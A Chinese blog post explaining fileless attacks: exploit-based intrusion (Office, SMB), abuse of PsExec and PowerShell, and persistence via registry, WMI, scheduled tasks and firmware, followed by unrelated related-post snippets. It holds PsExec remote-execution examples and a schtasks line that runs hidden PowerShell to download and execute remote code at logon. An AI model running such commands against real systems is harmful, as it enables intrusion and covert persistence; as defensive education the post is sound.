无文件攻击简介

一、无文件攻击介绍

" 无文件攻击 " 不代表真的没有文件,只是一种攻击策略,其出发点就是避免将恶意文件放在磁盘上,以逃避安全检测。所说的无文件,也未必是攻击全程无文件,而是其中的一部分采用了无文件攻击 。

因为无文件攻击无需落地到目标的磁盘,因此反病毒引擎一般很难检测到,即使通过检测内存来试图追踪内存中的“无文件攻击”,但往往只能采用白名单等笨方法,但攻击者利用内存滞留技术往往能把杀毒软件耍得团团转。

但是“无文件攻击”这一术语往往会让人产生歧义,比如无文件攻击就代表真的没有攻击文件吗?其实“无文件攻击”只是一种攻击策略,其出发点就是避免将恶意文件放在磁盘上,以逃避安全检测。

二、无文件攻击方式分类

1、按攻击方式分

无文件攻击方式分为三大类:漏洞型攻击、灰色工具型攻击、潜伏型攻击

在这里插入图片描述

1.1、漏洞型攻击

漏洞型攻击是杀伤力最大的无文件攻击方式,典型的漏洞有Office漏洞、SMB漏洞、以及各种WEB服务的漏洞,当目标主机存在漏洞时,病毒可以通过漏洞直接执行恶意命令攻击主机或将自己复制到主机实现扩散。漏洞型攻击行为隐蔽,且一般不会释放文件到本地,所以使用杀软几乎无法防御。

1.1.1、Office漏洞

利用Office系列软件的漏洞进行网络攻击成为黑客惯用的手段,广泛运用于APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将包含漏洞的文档伪装成为一个正常的Office文档,并精心构造文件名,然后投递到用户邮箱,如果用户不小心打开文档,恶意代码便会悄悄执行,用户完全没有感知。

1.1.2、SMB漏洞(永恒之蓝漏洞)

Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。

Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

1.2、灰色工具型攻击

灰色工具是指那些可以被用来执行恶意代码的合法工具,如:Powershell、PsExec等,病毒可以使用这些工具来间接执行恶意代码。由于IT管理员日常工作中都会使用这些合法工具来辅助管理系统、网络,所以杀软对这类攻击的检测也极具挑战性。

1.2.1、PsExec

psexec是sysinternals的一款强大的软件,通过他可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。通常,这个命令,常用的有如下2种方式。

1.以系统身份运行指定应用程序

这个很简单,但是很有意思,Windows系统中administrator的权限不是最大的,最大的是system,很多信息只有system才能查看,比如注册表的sam信息,administrator是看不了的,如果你非要强行修改sam的权限而不顾安全的话,拿就是另外一种情况。那么现在我们要以system的身份启动regedit.exe,命令如下:

psexec -s -i regedit.exe

-s就是以system身份,-i就是交互式,意思是让你看到注册表编辑器的这个窗口,不然他就在后台运行了。

2.创建/执行远程命令代码。

执行远程进程的前提条件是对方机器必须开启ipc,以及admin

,否则无法执行。下面我们来看详细命令:

ð 开启ipc$

net share ipc$

ð 开启admin$

net share admin$

ð 在对方电脑上运行程序

C:>psexec \192.168.100.2 -u administrator -p 123456 -d -s calc

运行calc后返回,对方计算机上会有一个calc进程,是以系统身份运行的,因为calc前面是-s(system的意思)。窗口对方是看不到的,如果需要对方看到这个窗口,需要加参数-i。

C:>psexec \192.168.100.2 -u administrator -p 123456 -d calc

承上,就以当前身份运行calc,然后返回

C:>psexec \192.168.100.2 -u administrator -p 123456 -i -d cmd /c start http:// www.baidu.com

为对方以当前用户身份打开百度网页,并让他看到这个网页

ð 在对方电脑上运行cmd命令,且不让对方看到这个窗口

C:>psexec \192.168.100.2 -u administrator -p 123456 -s cmd

这个命令执行成功之后,命令提示符窗口在我这边,可以直接在我这边输入命令,而命令在对端执行,相当于远端应用程序虚拟化到本地

1.2.2、powershell

PowerShell 是一个内置在每个受支持的Windows版本中 (Windows 7 / Windows 2008 R2 和更高版本)的命令行程序,它能够提供令人难以置信的灵活性和功能化管理 Windows 系统的能力。这种能力使得 PowerShell 正在吸引攻击者使它逐渐成为一个非常流行且得力的攻击工具。一旦攻击者可以在一台计算机上运行代码,他们就会执行 PowerShell 代码,因为PS代码可以运行在防病毒软件不能看到的地方如内存中。

1.3、潜伏性攻击

为了让病毒母体被删除后以及每次开机后还能继续执行恶意代码,持久化潜伏成为一种常见的无文件攻击方式。通过将恶意代码存储在注册表、WMI、系统进程(进程注入)、MBR、定时任务等地方,可以让恶意代码隐蔽地自动执行。

1.3.1、进程注入

进程注入技术很久以前就被病毒所利用了,病毒运行后一般会将恶意代码注入到系统进程中,然后将自身删除,达到隐藏的效果

1.3.2、注册表

注册表中包含许多敏感表项,如HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun,只要将病毒的路径或恶意的脚本存储到这里,系统每次开机都会执行这些病毒和恶意脚本,Poweliks就是使用注册表来进行持久化攻击的代表。

1.3.3、WMI

WMI以本地和远程方式提供了许多管理功能,包括查询系统信息、启动和停止进程以及设置条件触发器。管理员可以使用各种工具(比如Windows的WMI命令行工具wmic.exe)或者脚本编程语言(如PowerShell)提供的API接口来访问WMI。这样一个强大的工具自然会被黑客所盯上,著名的无文件攻击病毒POSHSPY就使用WMI来存储及定时执行恶意代码。以下是此病毒使用的一个触发器,意思是每周一、周二、周四、周五以及周六的当地时间上午11:33执行一次恶意脚本。

1.3.4、定时任务

定时任务是一个实用的工具,比如我们想实现每隔一段时间进行下文件备份、日志记录等等,就可以使用到定时任务,然而,若病毒执行了以下命令,那么就会带来恶意的操作,这段代码是只要用户一登录就调用powershell执行网上的恶意代码: schtasks/create /tn Trojan /tr “powershell.exe -WindowStyle hidden -NoLogo-NonInteractive -ep bypass -nop -c ‘IEX ((new-objectnet.webclient).downloadstring(‘’[REMOVED]’’))’” /scONLOGON /ru System 定时任务还常被病毒用来绕过UAC。

1.3.5、MBR

MBR是系统引导程序,对系统的启动很关键,试想,若病毒隐藏恶意代码于在MBR中,就可以实现先于系统加载,绕过杀软的效果。

2、按磁盘文件的活动分类

按磁盘文件的活动将攻击分成了3个类型

2.1、没有任何的文件活动

简单说就是攻击活动没有任何的磁盘文件落地和磁盘文件的操作行为,一般这种攻击的实施都脱离了操作系统,是由更上层的硬件固件和软件层发起的。

2.2、没有磁盘落地文件

没有磁盘落地文件,但通过文件间接活动,恶意代码一般通过白文件间接加载到内存中执行。这类攻击恶意代码的载体大多数都是脚本,通过程序命令执行,也有通过磁盘引导记录等特定机制的执行。

2.3、需要操作文件进行活动

比较容易能理解的意思是恶意代码变成了数据,利用文件相关的程序漏洞或功能特性将恶意数据转换为恶意代码执行。

3、基于被攻击宿主进行的分类

1、漏洞攻击,基于软件和操作系统安全漏洞的无文件攻击

  1. 基于文件(Type3)
    各种各样的office、flash、java漏洞文件和浏览器漏洞,一般都是通过恶意文件触发漏洞使文件解析引擎、浏览器等执行恶意代码,通过shellcode直接在内存中执行恶意代码。
  2. 基于网络(Type1)
    永恒之蓝是个好例子,直接通过网络协议的远程代码执行漏洞来执行恶意代码。

2、硬件攻击,脱离操作系统的无文件攻击

  1. 基于设备(Type1)
    通过网卡、磁盘固件执行恶意代码,经典的如方程式的KillSuit,基于硬盘固件、磁盘引导区执行恶意代码。
  2. 基于CPU(Type1)
    CPU自己本身也会有子系统,比如被白金改造的Intel cpu的主动管理技术(AMT)后门。
  3. 基于外置USB(Type1)
    USB可以外接的设备类型很多,比如最常见的模拟键盘和网关的badusb设备。
  4. 基于BIOS(Type1)
    主板BIOS能植入恶意代码大伙也是耳熟能详了,象今年eset发现的LoJax Rootkit,通过改造 BIOS固件中的防盗功能植入的后门。
  5. 基于虚拟机管理层(Type1)
    这是属于上帝视角的攻击了,虚拟机管理层执行恶意代码,已经脱离虚拟机操作系统之外了。

3、执行和注入,无文件攻击执行恶意代码的常见形式

  1. 基于文件(Type3)
    从执行代码的角度看,这是无文件攻击最基础的执行向量,可以是可执行文件、dll、lnk快捷方式、计划任务等,它的攻击过程通常是将恶意代码远程注入到其他进程或加载到自身进程内存执行。
  2. 基于宏(Type3)
    office文档相关的宏脚本,这是基于office文档类自身的脚本语言,在office进程中执行恶意代码。
  3. 基于脚本(Type2)
    基于js、vbs、powershell脚本执行恶意代码, 这个就不再赘述了,大量的系统程序都有各种奇技淫巧能执行恶意脚本。
  4. 基于磁盘(Type2)
    通过磁盘的引导记录执行恶意代码,恶意的mbr、vbr都在这一类里面。

参考链接:https://www.freebuf.com/column/203131.html

​ https://blog.csdn.net/weixin_41679427/article/details/104920331

​ http://t.zoukankan.com/bonelee-p-14915629.html
//www.freebuf.com/column/203131.html

​ https://blog.csdn.net/weixin_41679427/article/details/104920331

​ http://t.zoukankan.com/bonelee-p-14915629.html

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
计算机网络安全知识简介 ----- 2002年6月 计算机网络安全知识简介全文共78页,当前为第1页。 计算机网络安全概述 为什么要重视计算机网络安全 计算机网络的安全是一个越来越引起世界各国关注的重要问题,也是一个十分复杂的课题。随着计算机及其网络在人类生活个领域的广泛应用,计算机病毒也在不断产生和传播,计算机网络不断被非法入侵,重要资料被窃密,甚至由此造成网络系统的瘫痪等,已给各个国家以及众多公司造成巨大的经济损失,甚至危害到国家和地区的安全。因此,计算机系统的安全问题是一个关系到人类生活与生存的大事情,必须给予充分的重视并设法解决 。 计算机网络安全知识简介全文共78页,当前为第2页。 计算机网络安全概述 1983年 6名被称为"4 14黑客"的少年黑客被控侵入60多台电脑,其中包括斯洛恩-凯特林癌症纪念中心和洛斯阿拉莫斯国家实验室。最后,一名黑客因其所作证词而豁免无罪,另外5人被判缓刑。 1988年蠕虫的计算机病毒事件 1991年的海湾战争美国对伊拉克的信息战 1991年的海湾战争美国军事机密文件泄密 计算机网络安全知识简介全文共78页,当前为第3页。 计算机网络安全概述 据美国总审计局1996年一份调研报告透露,1995年,美国国防部计算机系统总共受到了25万次"攻击",其中有60%左右的"攻击"行动得逞。 1994年,美国国防部特意组织了一批"黑客"从INIERNET向国防部的计算机系统发起"攻击",以检测国防部计算机网络抵御信息战的能力。 计算机网络安全知识简介全文共78页,当前为第4页。 计算机网络安全概述 在被"黑"攻击的8900台计算机中竟有88%被"黑客"掌握了控制权,而这么多攻击行动只有4%被国防部的计算机管理人员发现。 英国于1994年11月破获的一起重大的计算机泄密事件。 成功地保护信息安全,侦测和对抗"黑客"们的攻击,已成为摆在各国国家安全部门面前的重大挑战。 计算机网络安全知识简介全文共78页,当前为第5页。 计算机网络安全概述 目前每年因电脑犯罪而造成的损失为429亿美元,这还仅仅是个开端。更为严重的是,许多大金融公司在发现有黑客闯入之后,通常采取自吞苦果的做法,宁可自己受损失也不举报、不声张。因为他们认为那样做的后果只会带来更大的损失,客户会感到该公司的网络不可靠,从而丧失消费者的信赖,有的则存有侥幸心理,认为黑客捞了一把就会转向别的公司或机构,姑息养奸的结果使黑客更加猖狂。 计算机网络安全知识简介全文共78页,当前为第6页。 计算机网络安全概述 统计数据表明,近几年来,利用计算机网络进行的各类违法行为以每年高于200%的速度递增。此间媒介报导,中国 95%的与国际互联网相接的网络管理中心都遭到过境内外黑客攻击或侵入,其中银行、金融和证券机构是黑客攻击的重点。 计算机网络安全知识简介全文共78页,当前为第7页。 计算机网络安全概述 什么是计算机网络安全 计算机网络安全的定义 从狭义的保护角度来看,计算机网络安全是指计算机及其网络系统资源和信息资源不受自然和人为有害因素的威胁和危害,即使指计算机、网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或恶意的原因而遭到破坏、更改、泄漏,确保系统能连续可靠、正常地运行,使网络服务部中断。计算机网络安全从其本质上来讲就是系统上的信息安全。 计算机网络安全知识简介全文共78页,当前为第8页。 计算机网络安全概述 从广义来说,凡是涉及到计算机网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是计算机网络安全的研究领域。所以,广义的计算机网络安全还包括信息设备的物理安全性,诸如场地环境保护、防火措施、防水措施、静电防护、电源保护。空调设备、计算机辐射和计算机病毒等。 计算机网络安全知识简介全文共78页,当前为第9页。 计算机网络安全概述 计算机网络安全的重要性 计算机存储和处理的是有关国家安全的政治、经济、军事、国防的情况及一些部门、机构、组织的机密信息或是个人的敏感信息、隐私,因此成为敌对势力、不法分子的攻击目标。 随着计算机系统功能的日益完善和速度的不断提高,系统组成越来越复杂、系统规模越来越大,特别是Internet的迅速发展,存取控制、逻辑连接数量不断增加,软件规模空前膨胀,任何隐含的缺陷、失误都能造成巨大损失。 计算机网络安全知识简介全文共78页,当前为第10页。 计算机网络安全概述 人们对计算机系统的需求在不断扩大,这类需求在许多方面都是不可逆转、不可替代的,而计算机系统使用的场所正在转向工业、农业、野外、天空、海上、宇宙空间、核辐射环境,……,这些环境都比机房恶劣,出错率和故障的增多必将导致可靠性和安全性的降低。 随着计算机系统的广泛应用,各类应用人员队伍迅速发展壮大,教育和培训却往往跟不上知识更新的需要,操作人员、编
你可曾遇到以下问题:员工辞职了,把公司的客户资料也拷走了;设计图纸落到了竞争对手手中;市场推广计划被个别员工泄露了……你发现在这个信息安全变得越来越重要的时代,你却对企业局域网内的信息安全束手无策。最痛苦的是,作为行政部或IT部的管理者,老板将一切责任归到你的头上……. 绿盾信息安全管理软件,可以帮您彻底解决以上问题。 软件名称:绿盾信息安全管理软件 版本信息:V1.10 大小:11.75MB 支持语言:中文版本/英文版本 适用系统:Windows 2000/XP/2003 开发商:厦门天锐科技有限公司 官方下载:www.ldsafe.com 功能简介: 一、文件加密模块 通过绿盾信息安全管理软件,系统在不改变用户原有工作流程和文件使用习惯的前提下,对需要保护的文件进行强制加密保护,并对文件的使用进行全程监控,即文件只能在企业局域网内部查看,离开局域网则为密文,这样有效防止了被动和主动泄密,消除内部安全隐患于无形之中。 1、系统方案:在服务器上(其他客户机可以和它通信的电脑)安装绿盾服务端,然后在文件服务器和需要使用共享文件的电脑上安装绿盾终端。在绿盾服务端上创建若干终端帐户,绿盾终端使用这些帐户登入。只有安装了绿盾终端的电脑在登入帐户后才可以使用或查看加密的文件,离开局域网后需要使用或查看加密文件需要得到服务端的解密或者授权才可。安装绿盾终端用户的文件在创建、存储、应用、传输等环节中均以加密形式存在,可以杜绝黑客工具的窃取和监听。 2、文件外发方案:如有内部文件需要外发,可把这些文件发送到只解密不加密的绿盾终端(通过设置登入终端的帐户类型实现),通过这些终端电脑将这些文件另存,另存后的文件即以明文的形式存在并可根据实际需要发送给企业外部客户。 3、离线方案:如企业内部员工需要带笔记本电脑脱离局域网(出差或在家查看加密文档),可以使用绿盾的离线策略。离线策略需要向管理员申请,获得批准后导入即可。且离线策略可以灵活设定离线使用天数,这样在方便员工外部办公的同时也有效地保证了文档的安全。 二、内网安全管理模块 1、实时操作日志 :实时详细地记录所有终端的操作日志。包括终端上窗口标题的变换、程序的启动关闭、浏览的网址、收发的邮件标题、创建删除文件等; 2、屏幕快照、屏幕追踪、屏幕回放  3、应用程序使用记录、使用限制、使用统计: 详细记录各个应用程序的开启关闭的时间,运行时间,活动时间等信息; 提供应用程序白名单和黑名单功能,方便地限制员工可以运行哪些程序,不能运行哪些程序; 4、文件及目录操作记录:详细记录文件创建、重命名、删除的情况;详细记录文件夹(目录)创建、重命名、删除等情况。 5、打印机操作记录:记录员工的打印机使用情况,包括打印的文档名、页数、打印时间等。 6、硬件使用限制: 限制使用USB设备、USB存储设备、光驱、软驱的使用。支持移动磁盘、光盘刻录文件操作的监视; 7、软硬件清单、变化记:远程列出员工计算机的软件和硬件清单及配置变化的记录; 8、YAHOO通/贸易通/新浪UC/ICQ/AOL/E话通/SKYPE/MSN专业版/TM/QQ等聊天内容记录监视 9、报警功能 10、Arp防火墙功能: 可进行IP、MAC 绑定,防止ARP攻击 。 11、远程控制功能: 重启、关闭计算机;注销WINDOWS;发送信息 。 12、资产管理功能 由于软件大于10MB,无法全部上传,只能上传一部分,请大家见谅。如果要下载的话,请到官方网站www.ldsafe.com下载。
::: 功能特性简介 ::: 防CC,防篡改,注入防御,提权防御,上传防御,未知0day防御,异形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 ?『目录限制』 有效防止入侵者通过脚本上传危险程序或代码,让服务运行于安全状态。 ?『执行限制』 防范入侵者执行危险程序,防范提权的发生。 ?『网络限制』 禁止脚本连接本机的危险端口,如常见的Serv-U提权端口,防范通过第三方软件的网络端口进行提权 禁止UDP向外发送,可有效防范UDP的DDOS攻击,如PHPDDOS等,有效限制网络带宽给恶意占用 ?『执行限制』 防范入侵者执行危险程序,防范提权的发生。 ?『组件限制』 禁止危险的组件,让服务器更安全。 ?『注入防御』 防范因网站有注入问题导致服务器给入侵。 ?『3389防御』 防范黑客未经许可登陆你的3389,让服务器更安全! ?『防CC攻击』 让网站免受CC攻击困扰! ?『禁止下载某文件类型』 防止不该给下载的文件给下载,防止信息外露! ?『允许执行的脚本扩展名』 有效的防止未经允许的扩展名脚本恶意执行,如:CER,CDX 等扩展名的木马。或是 /1.asp/1.gif 等会执行的情况 ?『禁止如下目录执行脚本』 防止图片和上传等可写目录执行脚本 ?『防范工具扫描网站目录和文件信息』 让入侵者不容易知道你的网站结构 ?『防范MSSQL数据库错误信息反馈暴露表或数据信息』 防范信息暴露。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值